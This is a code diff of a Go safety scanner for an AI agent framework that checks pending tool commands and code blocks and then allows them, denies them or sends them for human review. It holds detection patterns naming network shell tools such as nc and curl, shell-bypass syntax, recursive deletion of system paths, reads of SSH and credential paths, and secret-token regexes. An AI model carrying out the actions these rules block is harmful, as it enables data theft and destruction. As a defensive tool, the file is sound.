+		p.NetworkAllowlist = d.NetworkAllowlist
+	}
+	if p.MaxTimeoutSeconds == 0 {
+		p.MaxTimeoutSeconds = d.MaxTimeoutSeconds
+	}
+	if p.MaxOutputBytes == 0 {
+		p.MaxOutputBytes = d.MaxOutputBytes
+	}
+	if p.EnvAllowlist == nil {
+		p.EnvAllowlist = d.EnvAllowlist
+	}
+	if p.ReviewCommands == nil {
+		p.ReviewCommands = d.ReviewCommands
+	}
+	if !p.reviewShellPipelinesSet && !p.ReviewShellPipelines {
+		p.ReviewShellPipelines = d.ReviewShellPipelines
+	}
+	if !p.denyOnParseErrorSet && !p.DenyOnParseError {
+		p.DenyOnParseError = d.DenyOnParseError
+	}
+	return p
+}
+
+// ToolMetadata captures the execution-relevant metadata used by the guard.
+type ToolMetadata struct {
+	ReadOnly        bool `json:"read_only,omitempty"`
+	Destructive     bool `json:"destructive,omitempty"`
+	ConcurrencySafe bool `json:"concurrency_safe,omitempty"`
+	SearchOrRead    bool `json:"search_or_read,omitempty"`
+	OpenWorld       bool `json:"open_world,omitempty"`
+	MaxResultSize   int  `json:"max_result_size,omitempty"`
+}
+
+// CodeBlock is a script block supplied to a code execution tool.
+type CodeBlock struct {
+	Language string `json:"language,omitempty"`
+	Code     string `json:"code,omitempty"`
+}
+
+// Request describes one pending tool execution.
+type Request struct {
+	ToolName       string            `json:"tool_name,omitempty"`
+	Command        string            `json:"command,omitempty"`
+	Args           []string          `json:"args,omitempty"`
+	Cwd            string            `json:"cwd,omitempty"`
+	Env            map[string]string `json:"env,omitempty"`
+	Metadata       ToolMetadata      `json:"metadata,omitempty"`
+	Backend        string            `json:"backend,omitempty"`
+	TimeoutSeconds int               `json:"timeout_seconds,omitempty"`
+	MaxOutputBytes int64             `json:"max_output_bytes,omitempty"`
+	Background     bool              `json:"background,omitempty"`
+	TTY            bool              `json:"tty,omitempty"`
+	CodeBlocks     []CodeBlock       `json:"code_blocks,omitempty"`
+}
+
+// Finding is one matched safety rule.
+type Finding struct {
+	Decision       Decision  `json:"decision"`
+	RiskLevel      RiskLevel `json:"risk_level"`
+	RuleID         string    `json:"rule_id"`
+	Evidence       []string  `json:"evidence"`
+	Recommendation string    `json:"recommendation"`
+}
+
+// Report is the structured pre-execution scan result.
+type Report struct {
+	Decision       Decision  `json:"decision"`
+	RiskLevel      RiskLevel `json:"risk_level"`
+	RuleID         string    `json:"rule_id,omitempty"`
+	Evidence       []string  `json:"evidence,omitempty"`
+	Recommendation string    `json:"recommendation,omitempty"`
+	ToolName       string    `json:"tool_name,omitempty"`
+	Command        string    `json:"command,omitempty"`
+	Backend        string    `json:"backend,omitempty"`
+	Blocked        bool      `json:"blocked"`
+	Redacted       bool      `json:"redacted"`
+	DurationMillis int64     `json:"duration_ms"`
+	SafeSummary    string    `json:"safe_summary,omitempty"`
+	Findings       []Finding `json:"findings,omitempty"`
+}
+
+// AuditEvent is the JSONL-friendly monitoring event emitted for every scan.
+type AuditEvent struct {
+	Timestamp      string    `json:"timestamp"`
+	ToolName       string    `json:"tool_name,omitempty"`
+	Decision       Decision  `json:"decision"`
+	RiskLevel      RiskLevel `json:"risk_level"`
+	RuleID         string    `json:"rule_id,omitempty"`
+	DurationMillis int64     `json:"duration_ms"`
+	Redacted       bool      `json:"redacted"`
+	Blocked        bool      `json:"blocked"`
+	Backend        string    `json:"backend,omitempty"`
+}
+
+// SpanAttributes returns OpenTelemetry-ready attribute keys for callers that
+// want to attach scan outcomes to an active span.
+func (r Report) SpanAttributes() map[string]string {
+	return map[string]string{
+		"tool.safety.decision":   string(r.Decision),
+		"tool.safety.risk_level": string(r.RiskLevel),
+		"tool.safety.rule_id":    r.RuleID,
+		"tool.safety.backend":    r.Backend,
+	}
+}
+
+// AuditEvent returns the structured monitoring event for the report.
+func (r Report) AuditEvent(now time.Time) AuditEvent {
+	return AuditEvent{
+		Timestamp:      now.UTC().Format(time.RFC3339Nano),
+		ToolName:       r.ToolName,
+		Decision:       r.Decision,
+		RiskLevel:      r.RiskLevel,
+		RuleID:         r.RuleID,
+		DurationMillis: r.DurationMillis,
+		Redacted:       r.Redacted,
+		Blocked:        r.Blocked,
+		Backend:        r.Backend,
+	}
+}
+
+// WriteAuditJSONL writes one audit event as a JSONL record.
+func WriteAuditJSONL(w io.Writer, report Report) error {
+	if w == nil {
+		return nil
+	}
+	b, err := json.Marshal(report.AuditEvent(time.Now()))
+	if err != nil {
+		return err
+	}
+	b = append(b, '\n')
+	if _, err := w.Write(b); err != nil {
+		return err
+	}
+	return nil
+}
+
+// AppendAuditFile appends one report event to a JSONL audit file.
+func AppendAuditFile(path string, report Report) error {
+	if strings.TrimSpace(path) == "" {
+		return nil
+	}
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o600)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	return WriteAuditJSONL(f, report)
+}
+
+// Scan evaluates a pending tool execution against the policy.
+func Scan(req Request, policy Policy) Report {
+	start := time.Now()
+	policy = policy.withDefaults()
+	s := scanner{policy: policy}
+	report := s.scan(req)
+	report.DurationMillis = time.Since(start).Milliseconds()
+	return report
+}
+
+type scanner struct {
+	policy Policy
+}
+
+func (s scanner) scan(req Request) Report {
+	redactor := newRedactor()
+	cmd := requestCommand(req)
+	findings := make([]Finding, 0, 4)
+	findings = append(findings, s.scanMetadata(req)...)
+	findings = append(findings, s.scanEnv(req.Env)...)
+	findings = append(findings, s.scanRequestEnvelope(req)...)
+	if len(req.CodeBlocks) > 0 {
+		for _, block := range req.CodeBlocks {
+			findings = append(findings, s.scanCodeBlock(req, block)...)
+		}
+	} else {
+		findings = append(findings, s.scanShell(req, cmd)...)
+	}
+	report := s.reportFromFindings(req, cmd, findings, redactor)
+	report.Command = redactor.redact(report.Command)
+	report.Evidence = redactList(redactor, report.Evidence)
+	report.Recommendation = redactor.redact(report.Recommendation)
+	report.SafeSummary = redactor.redact(report.SafeSummary)
+	for i := range report.Findings {
+		report.Findings[i].Evidence = redactList(redactor, report.Findings[i].Evidence)
+		report.Findings[i].Recommendation = redactor.redact(report.Findings[i].Recommendation)
+	}
+	report.Redacted = redactor.changed
+	return report
+}
+
+func (s scanner) scanRequestEnvelope(req Request) []Finding {
+	var findings []Finding
+	if s.pathDenied(req.Cwd) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskCritical,
+			"sensitive.cwd_access",
+			[]string{fmt.Sprintf("working directory %q is denied", req.Cwd)},
+			"Choose a workspace-relative working directory that does not "+
+				"point at system paths, SSH material, credentials, or secrets.",
+		))
+	}
+	if req.Backend == BackendHostExec && (req.Background || req.TTY) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"hostexec.long_session",
+			[]string{"hostexec requested background or PTY execution"},
+			"Require human approval for host PTY/background sessions and "+
+				"ensure timeout, process-group cleanup, and output caps are enforced.",
+		))
+	}
+	if req.Background {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"process.background",
+			[]string{"command may leave a background process behind"},
+			"Run foreground commands with a bounded timeout, or record the "+
+				"session id and cleanup plan.",
+		))
+	}
+	if req.TimeoutSeconds > s.policy.MaxTimeoutSeconds {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.timeout_exceeded",
+			[]string{fmt.Sprintf("timeout %ds exceeds policy max %ds",
+				req.TimeoutSeconds, s.policy.MaxTimeoutSeconds)},
+			"Use a shorter timeout or update the safety policy after review.",
+		))
+	}
+	if req.MaxOutputBytes > s.policy.MaxOutputBytes {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.output_limit_exceeded",
+			[]string{fmt.Sprintf("requested output cap %d exceeds policy max %d",
+				req.MaxOutputBytes, s.policy.MaxOutputBytes)},
+			"Lower the output cap or collect a bounded artifact instead.",
+		))
+	}
+	return findings
+}
+
+func (s scanner) reportFromFindings(
+	req Request,
+	command string,
+	findings []Finding,
+	redactor *redactor,
+) Report {
+	best := Finding{
+		Decision:       DecisionAllow,
+		RiskLevel:      RiskLow,
+		Recommendation: "Command matched no high-risk safety rules.",
+	}
+	for _, f := range findings {
+		if findingBeats(f, best) {
+			best = f
+		}
+	}
+	decision := best.Decision
+	blocked := decision == DecisionDeny ||
+		decision == DecisionAsk ||
+		decision == DecisionNeedsHumanReview
+	summary := ""
+	if decision == DecisionAllow {
+		summary = safeSummary(req, command)
+	}
+	return Report{
+		Decision:       decision,
+		RiskLevel:      best.RiskLevel,
+		RuleID:         best.RuleID,
+		Evidence:       best.Evidence,
+		Recommendation: best.Recommendation,
+		ToolName:       req.ToolName,
+		Command:        redactor.redact(command),
+		Backend:        req.Backend,
+		Blocked:        blocked,
+		SafeSummary:    summary,
+		Findings:       findings,
+	}
+}
+
+func safeSummary(req Request, command string) string {
+	if len(req.CodeBlocks) > 0 {
+		return fmt.Sprintf(
+			"%s scan allowed %d code block(s); no high-risk network, path, "+
+				"shell, resource, dependency, or secret patterns matched.",
+			req.Backend, len(req.CodeBlocks))
+	}
+	return fmt.Sprintf(
+		"%s scan allowed command %q; no high-risk network, path, shell, "+
+			"resource, dependency, or secret patterns matched.",
+		req.Backend, command)
+}
+
+func requestCommand(req Request) string {
+	parts := make([]string, 0, 1+len(req.Args))
+	if strings.TrimSpace(req.Command) != "" {
+		parts = append(parts, strings.TrimSpace(req.Command))
+	}
+	parts = append(parts, req.Args...)
+	return strings.Join(parts, " ")
+}
+
+func findingBeats(a, b Finding) bool {
+	if decisionRank(a.Decision) != decisionRank(b.Decision) {
+		return decisionRank(a.Decision) > decisionRank(b.Decision)
+	}
+	return riskRank(a.RiskLevel) > riskRank(b.RiskLevel)
+}
+
+func decisionRank(d Decision) int {
+	switch d {
+	case DecisionDeny:
+		return 4
+	case DecisionNeedsHumanReview:
+		return 3
+	case DecisionAsk:
+		return 2
+	case DecisionAllow:
+		return 1
+	default:
+		return 0
+	}
+}
+
+func riskRank(level RiskLevel) int {
+	switch level {
+	case RiskCritical:
+		return 4
+	case RiskHigh:
+		return 3
+	case RiskMedium:
+		return 2
+	case RiskLow:
+		return 1
+	default:
+		return 0
+	}
+}
+
+func (s scanner) scanShell(req Request, command string) []Finding {
+	var findings []Finding
+	command = strings.TrimSpace(command)
+	if command == "" {
+		return []Finding{newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"command.empty",
+			[]string{"command is empty"},
+			"Provide an explicit command before invoking the tool.",
+		)}
+	}
+	findings = append(findings, s.scanRawCommand(req, command)...)
+	pipe, err := shellsafe.Parse(command)
+	if err != nil {
+		decision := DecisionAsk
+		if s.policy.DenyOnParseError {
+			decision = DecisionDeny
+		}
+		findings = append(findings, newFinding(
+			decision,
+			RiskHigh,
+			"shellsafe.parse_error",
+			[]string{err.Error()},
+			"Rewrite the command without shell expansion, redirection, "+
+				"subshells, background operators, or other unsupported shell syntax.",
+		))
+		return findings
+	}
+	findings = append(findings, s.scanParsedCommands(pipe)...)
+	return findings
+}
+
+func (s scanner) scanRawCommand(req Request, command string) []Finding {
+	var findings []Finding
+	lower := strings.ToLower(command)
+	findings = append(findings, s.scanSecretText(command, "command")...)
+	if hasShellBypass(lower) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"shell.bypass",
+			[]string{"command contains shell bypass syntax or wrapper"},
+			"Avoid sh -c, bash -c, eval, backticks, $(), variable expansion, "+
+				"redirections, and process substitutions in tool commands.",
+		))
+	}
+	findings = append(findings, s.scanNetwork(command)...)
+	if s.policy.ReviewShellPipelines && containsPipeline(command) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"shell.pipeline_review",
+			[]string{"command contains a shell pipeline or command chain"},
+			"Review multi-stage shell commands manually or replace them with "+
+				"a small audited script.",
+		))
+	}
+	if strings.Contains(lower, " &") || strings.HasSuffix(lower, "&") {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"process.background",
+			[]string{"command may leave a background process behind"},
+			"Run foreground commands with a bounded timeout, or record the "+
+				"session id and cleanup plan.",
+		))
+	}
+	findings = append(findings, s.scanResourcePatterns(lower)...)
+	return findings
+}
+
+func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
+	var findings []Finding
+	for _, argv := range pipe.Commands {
+		if len(argv) == 0 {
+			continue
+		}
+		name := commandName(argv[0])
+		full := strings.Join(argv, " ")
+		if s.commandDenied(name) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskHigh,
+				"policy.denied_command",
+				[]string{fmt.Sprintf("command %q is denied", name)},
+				"Remove the denied command or change the policy after review.",
+			))
+		}
+		if len(s.policy.AllowedCommands) > 0 && !s.commandAllowed(name) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskMedium,
+				"policy.command_not_allowed",
+				[]string{fmt.Sprintf("command %q is not in allowed_commands", name)},
+				"Use an allowed command or update allowed_commands in the policy.",
+			))
+		}
+		findings = append(findings, s.scanDangerousCommand(name, argv)...)
+		findings = append(findings, s.scanReviewCommand(full)...)
+		findings = append(findings, s.scanDeniedPaths(argv)...)
+	}
+	return findings
+}
+
+func (s scanner) scanDangerousCommand(name string, argv []string) []Finding {
+	var findings []Finding
+	if name == "rm" && destructiveRM(argv) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskCritical,
+			"dangerous.rm_rf",
+			[]string{strings.Join(argv, " ")},
+			"Do not run recursive forced deletion through tool execution.",
+		))
+	}
+	if name == "chmod" && containsArg(argv, "-R") {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"dangerous.recursive_chmod",
+			[]string{strings.Join(argv, " ")},
+			"Review recursive permission changes before executing.",
+		))
+	}
+	return findings
+}
+
+func destructiveRM(argv []string) bool {
+	recursive := false
+	force := false
+	targetSystem := false
+	for _, arg := range argv[1:] {
+		if strings.HasPrefix(arg, "-") {
+			if strings.Contains(arg, "r") || strings.Contains(arg, "R") {
+				recursive = true
+			}
+			if strings.Contains(arg, "f") {
+				force = true
+			}
+			continue
+		}
+		if isSystemPath(arg) {
+			targetSystem = true
+		}
+	}
+	return recursive && (force || targetSystem)
+}
+
+func isSystemPath(path string) bool {
+	p := strings.TrimSpace(strings.Trim(path, `"'`))
+	if p == "" {
+		return false
+	}
+	if p == "/" || p == "\\" {
+		return true
+	}
+	p = strings.ReplaceAll(p, "\\", "/")
+	system := []string{
+		"/bin", "/boot", "/dev", "/etc", "/lib", "/lib64", "/proc",
+		"/root", "/sbin", "/sys", "/usr", "/var",
+		"c:/windows", "c:/program files", "c:/programdata",
+	}
+	lp := strings.ToLower(p)
+	return slices.ContainsFunc(system, func(prefix string) bool {
+		return lp == prefix || strings.HasPrefix(lp, prefix+"/")
+	})
+}
+
+func (s scanner) scanReviewCommand(command string) []Finding {
+	lower := strings.ToLower(strings.TrimSpace(command))
+	for _, review := range s.policy.ReviewCommands {
+		r := strings.ToLower(strings.TrimSpace(review))
+		if r != "" && strings.HasPrefix(lower, r) {
+			return []Finding{newFinding(
+				DecisionNeedsHumanReview,
+				RiskMedium,
+				"dependency.environment_change",
+				[]string{fmt.Sprintf("command starts with %q", review)},
+				"Dependency installation or environment mutation should be "+
+					"reviewed and pinned before execution.",
+			)}
+		}
+	}
+	return nil
+}
+
+func (s scanner) scanDeniedPaths(argv []string) []Finding {
+	var findings []Finding
+	for _, arg := range argv[1:] {
+		clean := strings.Trim(arg, `"'`)
+		if s.pathDenied(clean) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskCritical,
+				"sensitive.path_access",
+				[]string{fmt.Sprintf("argument references denied path %q", clean)},
+				"Do not access SSH keys, .env files, credential stores, or "+
+					"system directories from tool execution.",
+			))
+		}
+	}
+	return findings
+}
+
+func (s scanner) pathDenied(path string) bool {
+	if path == "" {
+		return false
+	}
+	normalized := normalizePathForMatch(path)
+	for _, denied := range s.policy.DeniedPaths {
+		d := normalizePathForMatch(denied)
+		if d == "" {
+			continue
+		}
+		if normalized == d ||
+			strings.Contains(normalized, "/"+d+"/") ||
+			strings.HasSuffix(normalized, "/"+d) ||
+			strings.HasPrefix(normalized, d+"/") {
+			return true
+		}
+	}
+	return false
+}
+
+func normalizePathForMatch(path string) string {
+	p := strings.TrimSpace(strings.Trim(path, `"'`))
+	p = strings.ReplaceAll(p, "\\", "/")
+	p = strings.TrimPrefix(p, "~/")
+	p = strings.TrimPrefix(p, "./")
+	p = strings.ToLower(p)
+	if p == "/" {
+		return p
+	}
+	return strings.Trim(p, "/")
+}
+
+func (s scanner) scanNetwork(command string) []Finding {
+	var findings []Finding
+	lower := strings.ToLower(command)
+	networkCommand := regexp.MustCompile(`(^|[;&|]\s*)(curl|wget|nc|netcat|ssh|scp|rsync)\b`).
+		FindString(lower) != ""
+	urls := extractURLs(command)
+	for _, raw := range urls {
+		host := hostOf(raw)
+		if host == "" {
+			continue
+		}
+		if !s.hostAllowed(host) {
+			findings = append(findings, newFinding(
+				DecisionDeny,
+				RiskHigh,
+				"network.non_whitelisted_domain",
+				[]string{fmt.Sprintf("domain %q is not in network_allowlist", host)},
+				"Use a whitelisted domain or update network_allowlist after review.",
+			))
+		}
+	}
+	if networkCommand && len(urls) == 0 {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"network.unresolved_target",
+			[]string{"network-capable command has no parseable URL target"},
+			"Review the target manually or provide an explicit whitelisted URL.",
+		))
+	}
+	return findings
+}
+
+func extractURLs(s string) []string {
+	re := regexp.MustCompile(`https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+`)
+	return re.FindAllString(s, -1)
+}
+
+func hostOf(raw string) string {
+	u, err := url.Parse(raw)
+	if err != nil {
+		return ""
+	}
+	return strings.ToLower(u.Hostname())
+}
+
+func (s scanner) hostAllowed(host string) bool {
+	if host == "" {
+		return false
+	}
+	for _, allowed := range s.policy.NetworkAllowlist {
+		a := strings.ToLower(strings.TrimSpace(allowed))
+		if a == "" {
+			continue
+		}
+		if host == a || strings.HasSuffix(host, "."+a) {
+			return true
+		}
+	}
+	return false
+}
+
+func (s scanner) scanResourcePatterns(lower string) []Finding {
+	var findings []Finding
+	if longSleep(lower) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"resource.long_sleep",
+			[]string{"command contains a long sleep"},
+			"Use a shorter sleep or a bounded wait condition.",
+		))
+	}
+	if infiniteLoop(lower) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.infinite_loop",
+			[]string{"command appears to contain an infinite loop"},
+			"Replace the unbounded loop with a bounded command and timeout.",
+		))
+	}
+	if largeOutput(lower, s.policy.MaxOutputBytes) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.large_output",
+			[]string{"command appears to generate output above the policy limit"},
+			"Limit output size, write bounded artifacts, or raise the policy "+
+				"limit after review.",
+		))
+	}
+	if highConcurrency(lower) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"resource.high_concurrency",
+			[]string{"command appears to start many concurrent workers"},
+			"Use a bounded, reviewed concurrency level before executing.",
+		))
+	}
+	return findings
+}
+
+func longSleep(lower string) bool {
+	re := regexp.MustCompile(`\bsleep\s+([0-9]+)`)
+	m := re.FindStringSubmatch(lower)
+	if len(m) != 2 {
+		return false
+	}
+	n, _ := strconv.Atoi(m[1])
+	return n > 300
+}
+
+func infiniteLoop(lower string) bool {
+	patterns := []string{
+		"while true", "while(true)", "for ;;", "for(;;)",
+		"while 1", "while(1)",
+	}
+	return slices.ContainsFunc(patterns, func(p string) bool {
+		return strings.Contains(lower, p)
+	})
+}
+
+func largeOutput(lower string, limit int64) bool {
+	head := regexp.MustCompile(`\bhead\s+-c\s+([0-9]+)`)
+	if m := head.FindStringSubmatch(lower); len(m) == 2 {
+		n, _ := strconv.ParseInt(m[1], 10, 64)
+		return n > limit
+	}
+	if strings.Contains(lower, "yes ") || strings.HasPrefix(lower, "yes") {
+		return true
+	}
+	printRepeat := regexp.MustCompile(`print\s*\([^)]*\*\s*([0-9]{7,})`)
+	return printRepeat.MatchString(lower)
+}
+
+func highConcurrency(lower string) bool {
+	xargs := regexp.MustCompile(`\bxargs\b[^;&|]*\s-p\s*([0-9]+)`)
+	if m := xargs.FindStringSubmatch(lower); len(m) == 2 {
+		n, _ := strconv.Atoi(m[1])
+		return n > 8
+	}
+	parallel := regexp.MustCompile(`\bparallel\b[^;&|]*(?:-j|--jobs)\s*([0-9]+)`)
+	if m := parallel.FindStringSubmatch(lower); len(m) == 2 {
+		n, _ := strconv.Atoi(m[1])
+		return n > 8
+	}
+	return strings.Contains(lower, "gnu parallel")
+}
+
+func (s scanner) scanMetadata(req Request) []Finding {
+	if req.Metadata.Destructive {
+		return []Finding{newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"tool.metadata_destructive",
+			[]string{"tool metadata marks the tool as destructive"},
+			"Require review for destructive tools unless a narrower policy "+
+				"allows this exact operation.",
+		)}
+	}
+	return nil
+}
+
+func (s scanner) scanEnv(env map[string]string) []Finding {
+	var findings []Finding
+	for k, v := range env {
+		if len(s.policy.EnvAllowlist) > 0 && !s.envAllowed(k) {
+			findings = append(findings, newFinding(
+				DecisionNeedsHumanReview,
+				RiskMedium,
+				"environment.non_whitelisted_variable",
+				[]string{fmt.Sprintf("environment variable %q is not allowlisted", k)},
+				"Pass only environment variables listed in env_allowlist or "+
+					"update the policy after review.",
+			))
+		}
+		findings = append(findings, s.scanSecretText(k+"="+v, "environment")...)
+	}
+	return findings
+}
+
+func (s scanner) envAllowed(key string) bool {
+	for _, allowed := range s.policy.EnvAllowlist {
+		if strings.EqualFold(strings.TrimSpace(allowed), key) {
+			return true
+		}
+	}
+	return false
+}
+
+func (s scanner) scanSecretText(text, source string) []Finding {
+	if !looksSensitive(text) {
+		return nil
+	}
+	return []Finding{newFinding(
+		DecisionDeny,
+		RiskCritical,
+		"sensitive.secret_leak",
+		[]string{fmt.Sprintf("%s contains a likely secret", source)},
+		"Remove API keys, tokens, passwords, private keys, and credential "+
+			"material from command arguments, logs, artifacts, and audit events.",
+	)}
+}
+
+func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
+	lang := strings.ToLower(strings.TrimSpace(block.Language))
+	code := strings.TrimSpace(block.Code)
+	var findings []Finding
+	findings = append(findings, s.scanSecretText(code, "code block")...)
+	if lang == "bash" || lang == "sh" || lang == "shell" || lang == "" {
+		shellReq := req
+		shellReq.ToolName = "code_block"
+		shellReq.Command = code
+		shellReq.Backend = BackendCodeExec
+		shellReq.CodeBlocks = nil
+		findings = append(findings, s.scanShell(shellReq, code)...)
+		return findings
+	}
+	lower := strings.ToLower(code)
+	if strings.Contains(lower, "os.system") ||
+		strings.Contains(lower, "subprocess.") ||
+		strings.Contains(lower, "exec(") {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"codeexec.host_command_bridge",
+			[]string{fmt.Sprintf("%s code can launch shell commands", lang)},
+			"Review code that bridges from code execution into shell execution.",
+		))
+	}
+	findings = append(findings, s.scanNetwork(code)...)
+	findings = append(findings, s.scanResourcePatterns(lower)...)
+	return findings
+}
+
+func hasShellBypass(lower string) bool {
+	patterns := []string{
+		"sh -c", "bash -c", "zsh -c", "eval ", "`", "$(",
+		"${", ">", "<", " 2>", "exec ",
+	}
+	return slices.ContainsFunc(patterns, func(p string) bool {
+		return strings.Contains(lower, p)
+	})
+}
+
+func containsPipeline(command string) bool {
+	inSingle := false
+	inDouble := false
+	for i := 0; i < len(command); i++ {
+		switch command[i] {
+		case '\'':
+			if !inDouble {
+				inSingle = !inSingle
+			}
+		case '"':
+			if !inSingle {
+				inDouble = !inDouble
+			}
+		case '|', ';':
+			if !inSingle && !inDouble {
+				return true
+			}
+		case '&':
+			if !inSingle && !inDouble && i+1 < len(command) && command[i+1] == '&' {
+				return true
+			}
+		}
+	}
+	return false
+}
+
+func (s scanner) commandDenied(name string) bool {
+	for _, denied := range s.policy.DeniedCommands {
+		if strings.EqualFold(commandName(denied), name) {
+			return true
+		}
+	}
+	return false
+}
+
+func (s scanner) commandAllowed(name string) bool {
+	for _, allowed := range s.policy.AllowedCommands {
+		if strings.EqualFold(commandName(allowed), name) {
+			return true
+		}
+	}
+	return false
+}
+
+func commandName(name string) string {
+	name = strings.TrimSpace(strings.Trim(name, `"'`))
+	name = strings.ReplaceAll(name, "\\", "/")
+	base := filepath.Base(name)
+	base = strings.TrimSuffix(base, ".exe")
+	base = strings.TrimSuffix(base, ".cmd")
+	base = strings.TrimSuffix(base, ".bat")
+	base = strings.TrimSuffix(base, ".com")
+	return strings.ToLower(base)
+}
+
+func containsArg(argv []string, want string) bool {
+	return slices.ContainsFunc(argv, func(arg string) bool {
+		return arg == want
+	})
+}
+
+func newFinding(
+	decision Decision,
+	risk RiskLevel,
+	ruleID string,
+	evidence []string,
+	recommendation string,
+) Finding {
+	return Finding{
+		Decision:       decision,
+		RiskLevel:      risk,
+		RuleID:         ruleID,
+		Evidence:       evidence,
+		Recommendation: recommendation,
+	}
+}
+
+var (
+	secretNameRE = regexp.MustCompile(
+		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)`)
+	secretValueRE = regexp.MustCompile(
+		`(?i)(sk-[A-Za-z0-9_-]{12,}|ghp_[A-Za-z0-9_]{12,}|xox[baprs]-[A-Za-z0-9-]{10,}|-----BEGIN [A-Z ]*PRIVATE KEY-----)`)
+)
+
+func looksSensitive(text string) bool {
+	return secretValueRE.MatchString(text) ||
+		(secretNameRE.MatchString(text) && strings.Contains(text, "="))
+}
+
+type redactor struct {
+	changed bool
+}
+
+func newRedactor() *redactor { return &redactor{} }
+
+func (r *redactor) redact(s string) string {
+	orig := s
+	s = secretValueRE.ReplaceAllString(s, "[REDACTED_SECRET]")
+	nameValue := regexp.MustCompile(
+		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)=([^ \t\n\r;&|]+)`)
+	s = nameValue.ReplaceAllString(s, "$1=[REDACTED_SECRET]")
+	if s != orig {
+		r.changed = true
+	}
+	return s
+}
+
+func redactList(r *redactor, in []string) []string {
+	if len(in) == 0 {
+		return nil
+	}
+	out := make([]string, len(in))
+	for i, s := range in {
+		out[i] = r.redact(s)
+	}
+	return out
+}
+
+// ValidateReport checks that a report has the fields required by the safety
+// contract. It is mainly useful for examples and tests.
+func ValidateReport(report Report) error {
+	if report.Decision == "" {
+		return errors.New("missing decision")
+	}
+	if report.RiskLevel == "" {
+		return errors.New("missing risk_level")
+	}
+	if report.Decision != DecisionAllow && report.RuleID == "" {
+		return errors.New("missing rule_id")
+	}
+	if report.Decision != DecisionAllow && len(report.Evidence) == 0 {
+		return errors.New("missing evidence")
+	}
+	if report.Recommendation == "" {
+		return errors.New("missing recommendation")
+	}
+	return nil
+}

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -11,6 +11,7 @@
 package safety
 
 import (
+	"bytes"
 	"encoding/json"
 	"errors"
 	"fmt"
@@ -28,6 +29,7 @@ import (
 	"gopkg.in/yaml.v3"
 
 	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
+	"trpc.group/trpc-go/trpc-agent-go/tool/hostexec"
 )
 
 const (
@@ -65,11 +67,13 @@ type RiskLevel string
 
 // Policy controls how commands and scripts are scanned.
 type Policy struct {
-	AllowedCommands      []string `json:"allowed_commands,omitempty" yaml:"allowed_commands,omitempty"`
-	DeniedCommands       []string `json:"denied_commands,omitempty" yaml:"denied_commands,omitempty"`
-	DeniedPaths          []string `json:"denied_paths,omitempty" yaml:"denied_paths,omitempty"`
-	NetworkAllowlist     []string `json:"network_allowlist,omitempty" yaml:"network_allowlist,omitempty"`
-	MaxTimeoutSeconds    int      `json:"max_timeout_seconds,omitempty" yaml:"max_timeout_seconds,omitempty"`
+	AllowedCommands   []string `json:"allowed_commands,omitempty" yaml:"allowed_commands,omitempty"`
+	DeniedCommands    []string `json:"denied_commands,omitempty" yaml:"denied_commands,omitempty"`
+	DeniedPaths       []string `json:"denied_paths,omitempty" yaml:"denied_paths,omitempty"`
+	NetworkAllowlist  []string `json:"network_allowlist,omitempty" yaml:"network_allowlist,omitempty"`
+	MaxTimeoutSeconds int      `json:"max_timeout_seconds,omitempty" yaml:"max_timeout_seconds,omitempty"`
+	// MaxOutputBytes validates a cap declared by the request. Executors remain
+	// responsible for enforcing that cap while collecting output.
 	MaxOutputBytes       int64    `json:"max_output_bytes,omitempty" yaml:"max_output_bytes,omitempty"`
 	EnvAllowlist         []string `json:"env_allowlist,omitempty" yaml:"env_allowlist,omitempty"`
 	ReviewCommands       []string `json:"review_commands,omitempty" yaml:"review_commands,omitempty"`
@@ -125,24 +129,21 @@ func LoadPolicy(path string) (Policy, error) {
 	if err != nil {
 		return Policy{}, err
 	}
-	var raw map[string]any
-	switch strings.ToLower(filepath.Ext(path)) {
-	case ".json":
-		err = json.Unmarshal(b, &raw)
-	case ".yaml", ".yml", "":
-		err = yaml.Unmarshal(b, &raw)
-	default:
-		err = fmt.Errorf("unsupported policy extension %q", filepath.Ext(path))
+	ext := strings.ToLower(filepath.Ext(path))
+	if ext != ".json" && ext != ".yaml" && ext != ".yml" && ext != "" {
+		return Policy{}, fmt.Errorf("unsupported policy extension %q", filepath.Ext(path))
 	}
-	if err != nil {
+
+	p := DefaultPolicy()
+	if err := decodePolicy(b, ext, &p); err != nil {
 		return Policy{}, err
 	}
-	p := DefaultPolicy()
-	switch strings.ToLower(filepath.Ext(path)) {
